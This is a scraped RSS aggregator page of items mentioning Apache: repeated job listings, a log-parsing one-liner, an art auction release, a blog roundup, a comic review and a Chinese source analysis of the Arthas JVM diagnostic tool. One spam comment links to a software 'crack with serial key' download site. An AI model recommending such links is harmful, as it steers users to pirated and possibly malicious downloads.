PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Display IPs accessing your Apache webserver.      Cache   Translate Page      
$ egrep -o '\b[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\b' access.log | sort -u

commandlinefu.com

Diff your entire server config at ScriptRock.com


          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Доступен web-браузер Min 1.8      Cache   Translate Page      
Опубликован релиз web-браузера Min 1.8, предлагающего минималистичный интерфейс, построенный вокруг манипуляций с адресной строкой. Браузер создан с использованием платформы Electron, позволяющей создавать обособленные приложения на основе движка Chromium и платформы Node.js. Интерфейс Min написан на JavaScript, CSS и HTML. Код распространяется под лицензией Apache 2.0. Сборки сформированы для Linux, macOS и Windows.
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Re: "click to enter text" to create admin account does't work      Cache   Translate Page      
by Jacky kishan.  

hey, i am not sure it something to see with apache cause the link generated by php for this link "click to enter text" done:


 </span>
            <a href="#" data-passwordunmask="edit" title="">
                <span data-passwordunmask="displayvalue"><span>

<em>Click to enter text</em>
</span>


          (USA-VA-Chantilly) Linux Engineer      Cache   Translate Page      
Job Description CACI is currently looking for outstanding IT candidates to join our TSA IT Management, Performance Analysis, and Collaborative Technologies (IMPACT) team in the National Capital Region (NCR) and throughout the United States. CACI will provide a variety of IT services through IMPACT including cyber security, identity and access management, risk management, cloud integration and engineering, field support services, service desk, application deployment and optimization, and operations center support services. CACI will support TSA in both classified and unclassified IT operational environments increasing availability and security for a variety of applications and systems. IMPACT services will integrate with the broader DHS mission and enhance existing Department-wide IT capabilities. We welcome the opportunity for you to be part of our TSA IMPACT TEAM of Ever Vigilant! What You’ll Get to Do: + The Linux Engineer will be responsible for supporting, monitoring, testing and troubleshooting issues related to Linux servers. They will support highly complex systems including integration, security, and high-level Linux server administration. This individual provides input regarding future direction and growth of the Linux server infrastructure, performing design and implementation of enterprise wide infrastructures. + Create system scripts for daily administration and document system infrastructure. + Install new software releases, system upgrades, evaluate and install patches and resolve software and hardware related problems. + Perform system backups and recovery. + Maintain data files and monitors system configuration to ensure data integrity. + Maintain the functionality, security, and uptime of critical technology systems such as wireless networks, virtual machine and storage infrastructure, and communication systems. You’ll Bring these Qualifications + Red Hat Certified Engineer or Red Hat Certified System Administrator + Experience with configuring and deploying Linux based operating systems + Solid network and systems troubleshooting experience with HTTP\HTTPS, SFTP, FTP, NFS, SMB, SMTP, SSH, NTP and TCP/IP, Internet Security, encryption + Experience with Red Hat Satellite Server, puppet, chef or Ansible Tower + Proficient in Red Hat Enterprise Linux with in-depth knowledge of OS installation, security hardening and maintenance. + Experience working on physical and virtual (VMware) RHEL servers from scratch. + Administration and management of Red Hat Enterprise Linux 6 and 7 servers to include installation, configuration, optimization, backup & recovery + Linux performance tuning & troubleshooting, identifying and resolving contention in CPU, memory, networking, disk I/O, etc + Familiarity with fundamentals of Linux scripting languages for automation tasks and deployments such as Bash Shell, python & Kickstart technologies + Integration & implementation of various services, LDAP, Samba, NFS, Bind, Apache, and other core technologies + BA/BS or equivalent experience and minimum 5 years related work experience + Ability to obtain a DOD Security Clearance + Ability to obtain a DHS Entrance on Duty (EOD) These Qualification Would be Nice to Have: + Relevant DHS focused experience TSAHP What We Can Offer You: + We’ve been named a Best Place to Work by the Washington Post. + Our employees value the flexibility at CACI that allows them to balance quality work and their personal lives. + We offer competitive benefits and learning and development opportunities. + We are mission-oriented and ever vigilant in aligning our solutions with the nation’s highest priorities. + For over 55 years, the principles of CACI’s unique, character-based culture have been the driving force behind our success. Job Location US-Chantilly-VA-VIRGINIA SUBURBAN CACI employs a diverse range of talent to create an environment that fuels innovation and fosters continuous improvement and success. At CACI, you will have the opportunity to make an immediate impact by providing information solutions and services in support of national security missions and government transformation for Intelligence, Defense, and Federal Civilian customers. CACI is proud to provide dynamic careers for employees worldwide. CACI is an Equal Opportunity Employer - Females/Minorities/Protected Veterans/Individuals with Disabilities.
          (USA-IL-O'fallon) SAP Process Integration (PI)/ Process Orchestration (PO) Developer      Cache   Translate Page      
Job Description CACI is seeking a SAP Process Integration Developer to join an exciting contract in O'Fallon, IL. What You’ll Get to Do: + Design, develop, implement, test, deploy and provide O&M support for synchronous and asynchronous interfaces between Client SAP instances and external systems using the SAP PI/PO platform + Evaluate, model and design interface objects from an enterprise Service Architecture perspective to construct interfaces + Monitor production interfaces and address incidents within the expected timeframes + Import external WSDL structures into SAP PI/PO and build SOAP based interfaces + Configure interfaces to use various SAP PI/PO adapters and route traffic to external systems + Configure EDI interfaces using PO B2B adapter + Develop message mappings between complex source and target structures + Use Application Link Enabling to exchange data among SAP instances + Develop scripts, applets and Java code required to implement interfaces between SAP instances and external systems, traversing through the SAP PI/PO instance + Participate in 24x7 Operations and Maintenance call rotation support (future requirement) Application Development – Duties and Responsibilities + Implement SAP JAVA software applications and interfaces + Develop, test, debug, implement, maintain and document interfaces using EDI, SAP Proxy, and IDOC technologies + Developing and maintaining SAP design and technical specification documents + Conducting unit, integration and release testing to validate functionality + Supporting end-users Acceptance Testing activities You’ll Bring These Qualifications: + 6+ years of experience leading SAP application PI development efforts + At least 2 – 3 full lifecycles of SAP PI implementation experience including: + Trading partner setup and testing + Review of functional requirements and develop corresponding technical specifications + ALE configuration, configuring Partner Profiles, RFC Destinations, Logical Systems + Advanced message mapping, Java, XSLT, and ABAP, IDOC + Java coding and scripting + Application security technologies and approaches + Experience developing software in SAP NetWeaver Java Stack environments + Experience configuring and developing interfaces in the SAP PI/PO instance + Experience with WSDL and XSD definitions + Experience working on EDI 850, 860, 856, 810 transactions + Experience working with B2B adapter for designing and developing EDI mappings + Development knowledge of JAVA transactions, interface/dialog programming, ALE and IDOC's, RFC's, module pools, User Exits, BADIs, BAPIs, Batch Programming, SAP Script Output, IDOC development and maintenance, Data Dictionary, Function Modules, and other repository objects + Experience in using conversions ValueMapping, RFC Lookups and Parameterized Message Mapping + Experience in developing Advanced UDFs using ResultList, Container, GlobalContainer, AbstractTrace and Accessing Adapter-Specific Attributes + Experience with configuring and developing PI/PO alert monitoring + Ability to adhere to strict development standards and conduct code reviews + Ability to build web services + Knowledge of SAP IDOC processing and monitoring services including the SAP PI IDOC sender and receiver adapters to transform messages from SAP IDOC to XML format + Knowledge of SAP client / server proxy technology + Basic knowledge of HTML programming, Secure FTP, FIPS 140-2 compliant Apache web servers, LAN/WAN architecture, and Firewall Security + Experience using Microsoft Office products including Word, Excel and PowerPoint + Ability to work individually (self-motivated) and within a team environment + Effective interpersonal skills + Ability to obtain a DoD Secret Clearance + U.S. Citizen (no dual status) + BS/BA degree; or the equivalent These Qualifications Would be Nice to Have: + Knowledge of S4/HANA + SAP Certification in one or more of the following disciplines: + JAVA Development + SAP NetWeaver What We Can Offer You: - We’ve been named a Best Place to Work by the Washington Post. - Our employees value the flexibility at CACI that allows them to balance quality work and their personal lives. - We offer competitive benefits and learning and development opportunities. - We are mission-oriented and ever vigilant in aligning our solutions with the nation’s highest priorities. - For over 55 years, the principles of CACI’s unique, character-based culture have been the driving force behind our success. Job Location US-O'fallon-IL-ST LOUIS CACI employs a diverse range of talent to create an environment that fuels innovation and fosters continuous improvement and success. At CACI, you will have the opportunity to make an immediate impact by providing information solutions and services in support of national security missions and government transformation for Intelligence, Defense, and Federal Civilian customers. CACI is proud to provide dynamic careers for employees worldwide. CACI is an Equal Opportunity Employer - Females/Minorities/Protected Veterans/Individuals with Disabilities.
          Banksy's Seminal Protest Artwork Slave Labour Heads To Julien's Auctions Street & Contemporary Art Auction      Cache   Translate Page      

Julien's Auctions, the world record-breaking auction house, has announced that the fall edition of its biannual Street and Contemporary Art Auction will take place November 14, 2018 at Julien's Auctions in Los Angeles and live online at www.juliensauctions.com. Front and center will be a piece of one of the most talked about street artists in the news today-Banksy-whose latest at auction made headlines around the world when the work shredded itself seconds after the gavel came down for £1million.

Slave Labour (Bunting Boy) is a black and white aerosol on concrete piece (top photo), embellished with plastic flags executed by Banksy in May 2012 on the outer wall of a Poundland discount store in Wood Green, London (estimate: $600,000-$800,000). The piece is mounted on a custom platform and is accompanied by a clear protective case. Slave Labour depicts a young child on his knees at a sewing machine, diligently producing a string of Union Jack bunting. It is believed to have been created by Banksy as a protest against the use of sweatshops for the manufacture of souvenirs commemorating the Queen's Diamond Jubilee and the 2012 upcoming Summer Olympics in London. One of the most publicized and poignant examples of Banksy's social commentary, Slave Labour helped bring international attention to the exploitation of youth.

"We can't guarantee that our four Banksy's will automatically shred or explode but they will sell to the highest bidder!" said Darren Julien, President/Chief Executive Officer of Julien's Auctions.

Other notable Banksy works are also featured in the sale including Crazy Horse (estimate: $100,000-$125,000) (photo left), TV Girl (estimate: $40,000-$60,000) and Applause ($10,000-$15,000). Crazy Horse, a 2013 aerosol on car door with orange traffic cone installation was produced in New York City's Lower East Side, consisted of two heavily painted vehicles depicting a stampede of horses bearing down on a huddled group of terrified people, and included a phone number through which audio clips could be heard from a 2007 Baghdad airstrike by an Apache helicopter troop with the call-sign "Crazy Horse 18" in which two Reuters correspondents were reportedly killed. The audio and video transmissions from the airstrike, which had been released by Wikileaks in 2010 under the title "Collateral Murder," were shocking due to the apparent indifference of the troop regarding the loss of life, with one soldier saying "Oh well. Well it's their fault for bringing their kids to a battle."

Installed on October 9, 2013, as part of Banksy's highly-publicized New York City residency "Better Out Than In," is a reference to a quote attributed to 19th century impressionist painter, Paul Cezanne,...all pictures inside, in the studio, will never be as good as those painted outside." The work is accompanied by a custom-built display stand.. Banksy's Instagram post of this artwork on his personal account can be seen via the following link https://www.instagram.com/p/fQEYojK-we/.

TV Girl (circa 2003/2004) is an aerosol on Burger King sign executed by Banksy in his hometown of Bristol, England. It is accompanied by a signed letter from SWRDA relinquishing ownership of the sign from the building site, and a signed letter from Brandler Galleries regarding the work's authenticity and value. (estimate: $40,000-$60,000) (photo left).

Banksy's Applause is a 2006 Screenprint on paper signed and dated in pencil lower left and numbered in pencil lower right 73/150 with embossed POW logo (estimate: $10,000-$15,000).

Additional highlights of the auction include Street Art legend Jean-Michel Basquiat and his work Head (Portfolio I) (estimate: $80,000-$100,000) - a 2001 Screenprint on paper from the series published by DeSanctis Carr Fine Art and authorized by the Basquiat Estate (photo left) and Untitled (Portrait with Crown of Thorns II) - 1981 by Basquiat, marker on paper signed and dated in black marker lower right (estimate: $20,000-$40,000).

A rare, personal item of Basquiat's will also be offered at auction: his black wool Comme Des Garçons coat. (estimate $20,000-$30,000). The coat was in the possession of Basquiat's last girlfriend Kelle Inman after the artist's death in 1987. Basquiat is known to have been a fan of the casual, urban streetwear line and modeled on the runway for their Spring/Summer 197 Collection. Several photographs of Basquiat wearing the coat exist including images with Andy Warhol (shown in photo below right), Spike Lee and his mother Matilde Andradas.

Also featured in the auction is Invader with LA_200 - 2018 executed on the side of a Los Angeles law office building (estimate: $20,000-40,000); New York's pop art and graffiti artist Keith Haring's Untitled (Robot and Snake) (estimate: $15,000-$20,000) with his 1984 White marker on black cardstock panels work. The sale also features Shephard Fairey with 2012 Arab Woman, (estimate: $6,000-$8,000), a screenprint on embossed paper as well as pop culture provocateur RETNA with Sonia 2 2010 Screenprint on paper, (estimate: $10,000-$15,000.) The November 14 event will also include works by Andy Warhol, Clet Abraham, Kusama, Swoon, Mr. Brainwash, KAWS and more.


          Interesting Stuff - Week 40      Cache   Translate Page      

Throughout the week, I read a lot of blog-posts, articles, and so forth, that has to do with things that interest me:

data science data in general distributed computing SQL Server transactions (both db as well as non db) and other “stuff”

This blog-post is the “roundup” of the things that have been most interesting to me, for the week just ending.

.NET Update on .NET Core 3.0 and .NET Framework 4.8 . A blog post from the .NET engineering team, where they talk about the future of the .NET Framework and .NET Core. I wonder if this post was prompted by speculations recently about the future of the .NET Framework, where there were questions whether the .NET Framework 4.8 would be the last version, and all development would be concentrated on .NET Core. Azure Enabling real-time data warehousing with Azure SQL Data Warehouse . This post is an announcement how Striim now fully supports SQL Data Warehouse as a target for Striim for Azure. Striim is a system which enables continuous non-intrusive performant ingestion of enterprise data from a variety of sources in real time. Streaming Is Event Streaming the New Big Thing for Finance? . An excellent blog post by Ben Stopford where he discusses the use of event streaming in the financial sector. Troubleshooting KSQL Part 2: What’s Happening Under the Covers? . The second post by Robin Moffat about debugging of KSQL. In this post - Robin, as the title says, goes under the covers to figure out what happens with KSQL queries. 6 things to consider when defining your Apache Flink cluster size . This post discusses how to plan and calculate a Flink cluster size. In other words; how to define the number of resources you need to run a specific Flink job. MS Ignite Syllabuck: Ignite 2018 Conference . A great list of MS Ignite sessions that Buck Woody found interesting! Now I know what to do in my spare time! Data Science Customized regression model for Airbnb dynamic pricing . This post by Adrian is about a white-paper which details the methods that Airbnb use to suggest prices to listing hosts. Cleaning and Preparing Data in python . A post which lists Python methods and functions that helps to clean and prepare data. The Microsoft Infer.NET machine learning framework goes open source . A blog post from Microsoft Research, in which they announce the open-sourcing of Infer.NET . Is anyone else but me somewhat confused about the various data science frameworks that Microsoft has? How to build a Simple Recommender System in Python . A blog post which discusses what a recommender system is and how you can use Python to build one. What Is Niels Doing (WIND)

That is a good question! As you know, I wrote two blog posts about SQL Server 2019:

What is New in SQL Server 2019 Public Preview SQL Server 2019 for linux in Docker on windows

My plan was to relatively quickly follow up those two posts with a third post how to run SQL Server Machine Learning Services on SQL Server 2019 on Linux , and do it inside a Docker container. After having spent some time trying to get it to work, (with no luck), I gave up and contacted a couple of persons in MS asking for help. The response was that, right now in SQL Server 2019 on Linux CTP 2.0 , you cannot do it - bummer! The functionality will be in a future release.

I am now reworking the post I had started on to cover SQL Server Machine Learning Services in an Ubuntu based SQL Server 2019 on Linux . I should be able to publish something within a week or two.

I am also working on the third post in the Install R Packages in SQL Server ML Services series (still). Right now I have no idea when I can publish it - Sorry!

~ Finally

That’s all for this week. I hope you enjoy what I did put together. If you have ideas for what to cover, please comment on this post or ping me.

Blog Feed: To automatically receive more posts like this, please subscribe to my RSS/Atom feed

in your feed reader!


          Big Data Architect - Pythian - Seattle, WA      Cache   Translate Page      
Experience Architecting Big Data platforms using Apache Hadoop, Cloudera, Hortonworks and MapR distributions. Big Data Principal Architect*.... $140,000 - $160,000 a year
From Indeed - Mon, 17 Sep 2018 17:36:04 GMT - View all Seattle, WA jobs
          Google Cloud Solutions Architect - Pythian - Seattle, WA      Cache   Translate Page      
Experience Architecting Big Data platforms using Apache Hadoop, Cloudera, Hortonworks and MapR distributions. Google Cloud Solutions Architect (Pre Sales)*.... $130,000 - $200,000 a year
From Indeed - Tue, 21 Aug 2018 19:51:26 GMT - View all Seattle, WA jobs
          Senior Big Data Architect – PSJH - Providence Health & Services - Seattle, WA      Cache   Translate Page      
Experience Architecting Big Data platforms using Apache Hadoop, Cloudera, Hortonworks and MapR distributions. Providence is calling a Senior Big Data Architect ...
From Providence Health & Services - Sat, 25 Aug 2018 20:02:04 GMT - View all Seattle, WA jobs
          Principal Big Data Architect - PSJH - Providence Health & Services - Seattle, WA      Cache   Translate Page      
Experience Architecting Big Data platforms using Apache Hadoop, Cloudera, Hortonworks and MapR distributions....
From Providence Health & Services - Mon, 16 Jul 2018 16:41:32 GMT - View all Seattle, WA jobs
          Senior Big Data Architect – PSJH - Providence Health & Services - Renton, WA      Cache   Translate Page      
Experience Architecting Big Data platforms using Apache Hadoop, Cloudera, Hortonworks and MapR distributions. Providence is calling a Senior Big Data Architect ...
From Providence Health & Services - Sat, 25 Aug 2018 20:01:08 GMT - View all Renton, WA jobs
          Principal Big Data Architect - PSJH - Providence Health & Services - Renton, WA      Cache   Translate Page      
Experience Architecting Big Data platforms using Apache Hadoop, Cloudera, Hortonworks and MapR distributions....
From Providence Health & Services - Mon, 16 Jul 2018 16:38:13 GMT - View all Renton, WA jobs
          Comment on Configuring a Local Apache/PHP/MySQL Dev Environment in OS X by Muhammad Talha      Cache   Translate Page      
I have found way to host multiple website locally on your mac. Download the Updated version of VirtualHostX https://crackmines.com/virtualhostx-crack-with-serial-key-windows-mac/
          MSI GE72MVR Apache Pro-080 7th Gen Core i7 17.3" Gaming Laptop $1189 at Newegg      Cache   Translate Page      
Newegg has the MSI GE72MVR Apache Pro-080 7th Generation Core i7 17.3" Gaming Laptop for $1349 - $10 off with coupon code EMCEPPY46 - $150 rebate [Exp 10/31] = $1189 with free shipping.

  • Intel Core i7-7700HQ Quad 2.8GHz, 16GB DDR4 RAM, 1TB HDD + 128GB SSD
  • 1920x1080, GeForce GTX 1070 8GB GDDR5, Win 10 Home x64
  •           SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
    PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
    From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
              SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
    PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
    From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
              Developer Enterprise Data Integration - Wipro LTD - McLean, VA      Cache   Translate Page      
    Mandatory Skills: Ab Initio Desirable Skills: Amazon Web Services - AWS, Apache Spark Job Description: Key skills required for the job are: Ab Initio-L3 ...
    From Wipro LTD - Wed, 03 Oct 2018 10:48:05 GMT - View all McLean, VA jobs
              Senior QA Engineer - Cast & Crew Entertainment Services - Burbank, CA      Cache   Translate Page      
    Robot Framework Test Automation, Apache JMeter - Load and Performance Test, Selenium. Perform manual and automated Functional, Performance and End to End...
    From Cast & Crew Entertainment Services - Thu, 20 Sep 2018 06:29:47 GMT - View all Burbank, CA jobs
              .htaccess issue: trailing slash added, but not working for subdirectory      Cache   Translate Page      
    Forum: Apache configuration Posted By: Santuzzo Post Time: Oct 10th, 2018 at 12:04 AM
              SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
    PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
    From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
              SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
    PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
    From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
              SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
    PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
    From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
              Senior QA Engineer - Cast & Crew Entertainment Services - Burbank, CA      Cache   Translate Page      
    Robot Framework Test Automation, Apache JMeter - Load and Performance Test, Selenium. Perform manual and automated Functional, Performance and End to End...
    From Cast & Crew Entertainment Services - Thu, 20 Sep 2018 06:29:47 GMT - View all Burbank, CA jobs
              SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
    PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
    From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
              By: Kid      Cache   Translate Page      
    "You probably missed it in the rush of news last week, but there was actually a report that someone in Pakistan had published in a newspaper an offer of a reward to anyone who killed an American, any American. So I just thought I would write to let them know what an American is, so they would know when they found one. An American is English, French, Italian, Irish, German, Spanish, Polish, Russian or Greek. An American may also be Mexican, African, Indian, Chinese, Japanese, Australian, Iranian, or Asian. An American may also be a Cherokee, Osage, Blackfoot, Navaho, Apache, or one of the many other tribes known as native Americans. An American is Christian, or he could be Jewish, or Buddhist. The only difference is that in America they are free to worship as each of them chooses. An American is also free to believe in no religion. For that he will answer only to God, not to the government, or to armed thugs claiming to speak for the government and for God. An American is from the most prosperous land in the history of the world. The root of that prosperity can be found in the Declaration of Independence, which recognizes the God given right of each man and woman to the pursuit of happiness. An American is generous. Americans have helped out just about every other nation in the world in their time of need. When Afghanistan was overrun by the Soviet army 20 years ago, Americans came with arms and supplies to enable the people to win back their country. As of the morning of September 11, Americans had given more than any other nation to the poor in Afghanistan. The best products, the best books, the best music, the best food, the best athletes. Americans welcome the best, but they also welcome the least. The national symbol of America welcomes your tired and your poor, the wretched refuse of your teeming shores, the homeless, tempest tossed. These in fact are the people who built America. Some of them were working in the Twin Towers in the morning of September 11, earning a better life for their families. [I've been told that the people in the Towers were from at least 30, and maybe many more, other countries, cultures, and first languages, including those that aided and abetted the terrorists.] So you can try to kill an American if you must. Hitler did. So did General Tojo, and Stalin, and Mao Tse-Tung, and every bloodthirsty tyrant in the history of the world. But, in doing so you would just be killing yourself. Because Americans are not a particular people from a particular place. They are the embodiment of the human spirit of freedom. Everyone who holds to that spirit, everywhere, is an American. So look around you. You may find more Americans in your land than you thought were there. One day they will rise up and overthrow the old, ignorant, tired tyrants that trouble too many lands. Then those lands, too, will join the community of free and prosperous nations. And America will welcome them!
              SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
    PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
    From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
              SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
    PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
    From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
              BAJO EL CIELO ROJO DE MARTE      Cache   Translate Page      
    Las recientes visitas a librerías especializadas nos ayudan a descubrir la aparición de muchos nuevos y no tan nuevos pequeños editores de cómics que van añadiendo al mercado español las novedades más variopintas.


    Una de las editoriales más activas en el campo de la CF y Fantasía, Apache, tiene una creciente línea de cómics en donde encaja a la perfección un nuevo álbum cuyo evocador título bien podría haberlo escrito Burroughs para una aventura de John Carter.


    Natane atraviesa las grandes llanuras marcianas -evocadoras del Oeste terrestre- en su montura robótica. Es una mujer con una misión de venganza y justicia.

    El guión nos mostrará en flashbacks su vida e historia y las guerras que se han desatado en un Marte colonizado, de estética a lo Mad Max y que ella está empeñada en concluir.



    Un buen guión, grandes diálogos que nos identifican con los protagonistas y de la parte artística resaltaríamos el color que, con sus tonalidades naranjas, ayuda a dotar a todo el paisaje de esa cualidad alienígena y ensoñadora.

    El cómic ha sido premiado por la Consejería de Cultura de Baleares en el certamen ART JOVE.
              Tecnico sistemas Linux - PUE - Madrid, España      Cache   Translate Page      
    Funciones: Administrador de Sistemas que estará habituado a trabajar en entornos críticos y con requerimientos de alta disponibilidad. Sus responsabilidades y conocimientos serán en cuanto a sistemas operativos y tecnologías utilizadas: Instalación, configuración y mantenimiento de SO Linux RHEL y CentOS. Conocimientos de Scripting bash. Instalación, configuración y mantenimiento de servidores web Apache. Seguridad y bastionado del sistema operativo Instalación, configuración y...
              Use Groovy to customize the Maven build process      Cache   Translate Page      

    Apache Maven is a popular build automation tool used primarily for Java projects (although it can also be used to build and manage projects written in other languages). Maven uses a pom.xml file to centrally manage a project’s build and its dependencies. If you have worked anywhere near to the Java ecosystem chances are that, […]

    The post Use Groovy to customize the Maven build process appeared first on RHD Blog.


              阿里监控诊断工具 Arthas 源码原理分析      Cache   Translate Page      

    image

    上个月,阿里开源了监控与诊断工具 「Arthas」,一款可用于线上问题分析的利器,短期之内收获了大量关注,在 Twitter 上连 Java 官方的 Twitter 也转发了,真的很赞。

    GitHub 上是这样自述的:

    Arthas 是一款线上监控诊断产品,通过全局视角实时查看应用 load、内存、gc、线程的状态信息,并能在不修改应用代码的情况下,对业务问题进行诊断,包括查看方法调用的出入参、异常,监测方法执行耗时,类加载信息等,大大提升线上问题排查效率。

    我一般看到感兴趣的开源工具,会找几个最感兴趣的功能点切入,从源码了解设计与实现原理。对于一些自己了解的实现思路,再从源码中验证一下是否是采用相同的实现思路。如果实现和自己想的一样,可能你会想,啊哈,想到一块了。如果源码中是另一种实现,你就会想 Cool, 还可以这样玩。仿佛如同在和源码的作者对话一样

    这次趁着国庆假期看了一些「Arthas」的源码,大致总结下。

    从源码的包结构上,可以看到分为几个大的 模块:

    • Agent       -- VM 加载的自定义 Agent

    • Client       -- Telnet 客户端实现

    • Core        -- Arthas 核心实现,包含连接 VM, 解析各类命令等

    • Site          -- Arthas 的帮助手册站点内容

    我主要看了以下几个功能:

    连接进程

    连接到指定的进程,是后续监控与诊断的基础。只有先 attach 到进程之上,才能获取 VM 对应的信息,查询 ClassLoader 加载的类等等。

    怎样连接到进程呢?
    用于类似诊断工具的读者可能都有印象,像 JProfile、 VisualVM 等工具,都会让你选择一个要连接到的进程。然后再在指定的 VM 上进行操作。比如查看对应的内存分区信息,内存垃圾收集信息,执行 BTrace脚本等等。

    咱们先来想想,这些可供连接的进程列表,是怎么列出来的呢?
    一般可能会是类似ps aux | grep java这种,或者是使用 Java 提供的工具jps -lv都可以列出包含进程id的内容。我在很早之前的文章里写过一点 jps 的内容(你可能不知道的几个java小工具),其背后实现,是会将本地启动的所有 Java 进程,以pid做为文件名存放在Java 的临时目录中。这个列表,遍历这些文件即可得出来。

    Arthas 是怎么做的呢?
    在启动脚本as.sh中,有关于进程列表的代码如下,实现也是通过jps然后把Jps自己排除掉:

    # check pid
        if [ -z ${TARGET_PID} ] && [ ${BATCH_MODE} = false ]; then
            local IFS_backup=$IFS
            IFS=$'\n'
            CANDIDATES=($(${JAVA_HOME}/bin/jps -l | grep -v sun.tools.jps.Jps | awk '{print $0}'))
    
            if [ ${#CANDIDATES[@]} -eq 0 ]; then
                echo "Error: no available java process to attach."
                # recover IFS
                IFS=$IFS_backup
                return 1
            fi
    
            echo "Found existing java process, please choose one and hit RETURN."
    
            index=0
            suggest=1
            # auto select tomcat/pandora-boot process
            for process in "${CANDIDATES[@]}"; do
                index=$(($index+1))
                if [ $(echo ${process} | grep -c org.apache.catalina.startup.Bootstrap) -eq 1 ] \
                    || [ $(echo ${process} | grep -c com.taobao.pandora.boot.loader.SarLauncher) -eq 1 ]
                then
                   suggest=${index}
                   break
                fi
            done

    选择好进程之后,就是连接到指定进程了。连接部分在attach这里

    # attach arthas to target jvm
    # $1 : arthas_local_version
    attach_jvm()
    {
        local arthas_version=$1
        local arthas_lib_dir=${ARTHAS_LIB_DIR}/${arthas_version}/arthas
    
        echo "Attaching to ${TARGET_PID} using version ${1}..."
    
        if [ ${TARGET_IP} = ${DEFAULT_TARGET_IP} ]; then
            ${JAVA_HOME}/bin/java \
                ${ARTHAS_OPTS} ${BOOT_CLASSPATH} ${JVM_OPTS} \
                -jar ${arthas_lib_dir}/arthas-core.jar \
                    -pid ${TARGET_PID} \
                    -target-ip ${TARGET_IP} \
                    -telnet-port ${TELNET_PORT} \
                    -http-port ${HTTP_PORT} \
                    -core "${arthas_lib_dir}/arthas-core.jar" \
                    -agent "${arthas_lib_dir}/arthas-agent.jar"
        fi
    }

    对于 JVM 内部的 attach 实现,

    是通过tools.jar这个包中的com.sun.tools.attach.VirtualMachine以及VirtualMachine.attach(pid)这种方式来实现的。

    底层则是通过JVMTI。之前的文章简单分析过JVMTI这种技术(当我们谈Debug时,我们在谈什么(Debug实现原理)),在运行前或者运行时,将自定义的 Agent加载并和 VM 进行通信
    上面具体执行的内容在arthas-core.jar的主类中,我们来看具体的内容:

    private void attachAgent(Configure configure) throws Exception {
            VirtualMachineDescriptor virtualMachineDescriptor = null;
            for (VirtualMachineDescriptor descriptor : VirtualMachine.list()) {
                String pid = descriptor.id();
                if (pid.equals(Integer.toString(configure.getJavaPid()))) {
                    virtualMachineDescriptor = descriptor;
                }
            }
            VirtualMachine virtualMachine = null;
            try {
                if (null == virtualMachineDescriptor) { // 使用 attach(String pid) 这种方式
